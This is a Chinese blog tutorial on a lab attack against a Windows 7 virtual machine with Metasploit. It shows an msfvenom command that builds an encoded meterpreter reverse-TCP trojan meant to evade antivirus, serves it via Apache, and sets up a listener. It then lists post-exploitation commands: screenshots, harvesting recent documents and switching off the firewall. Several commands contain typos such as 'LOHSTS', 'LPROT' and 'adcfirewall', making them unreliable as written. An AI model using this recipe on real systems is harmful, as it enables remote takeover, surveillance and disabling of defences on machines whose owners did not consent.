目录
1.安装靶机和攻击机
2.利用生成木马文件
3.msf里面开启监听
4.攻击成功且利用
5.meterpreter简单系统命令
首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。
kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。
攻击机 kali ip是192.168.3.138
靶机win7 ip是192.168.3.150
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LOHSTS=192.168.3.138 LPROT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜1.exe
-a 指定构架如x86 x64。 x86代表32位, x64代表64位。 32位软件可以在64 位系统上运行。所以我们生成32位的后门。这样在32位和64位系统中都可以使用。
--platform 指定平台,这里选择windows 通过 --l platform可以查看所有支持平台。
-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷
LOHSTS监听的ip地址
LPROT 监听端口
-e 指定编码器,也就是所谓的免杀, x64/shikata_ga_nai是msf自带的编码器 -l encode 查看有多少编码器
-i 制作的软件字节,可随意
-f 输出文件格式
-b 避免使用的字符
-o 文件输出位置以及名字
如果你想靶机能够下载文件,需要在kali开启apache 命令:systemctl start apache2
在win7里面输入地址192.168.3.138/西瓜1.exe,先保存,我保存在桌面方便后期操作。
第一步:开启msf:msfdb run
第二步:使用 use exploit/multi/handler
第三步:查看参数 show options 可以通过show payload 查看需要设置那个payload 。
第四步:设置payload 可以看到默认的payload不是我想要的,所以我要重新设置一下,这个payload和你上面产生木马文件的payload要一样的。set payload windows/meterpreter/reverse_tcp
第五步:设置监听的IP地址 set LHOST 192.168.3.138
第六步: 开启监听 run
这时候当对方运行软件的时候,这边就会监听到,运行一下就可以了
可以看到建立会话,查看用户是普通用户,因为我登录时候就是普通用户登录的。下一篇是我基于win7的提权文章,如果想拿到更高权限,感兴趣可以看看。
基于msf内网渗透的win7提权几种方法_dreamthe的博客-CSDN博客
1.ps命令可以用来获取目标主机上正在运行的进程信息
2.sysinfo 查看系统信息
3.screenshot对于目标机进行截图
5.run post/windows/gather/checkvm 查看目标机是不是虚拟机。
6.7.run post/windows/gather/dumplinks 获取目标主机上最近访问过的文档、链接信息
7.netsh adcfirewall set allprofiles state off 关闭防火墙
8.backgroup 将会话保存到后台
9.sessions 查看当前会话
10.sessions -i 11 进入会话,11是会话的ID就是编号。
11.sessions -k 11 会话结束。
12.unset LHOSt 撤销设置。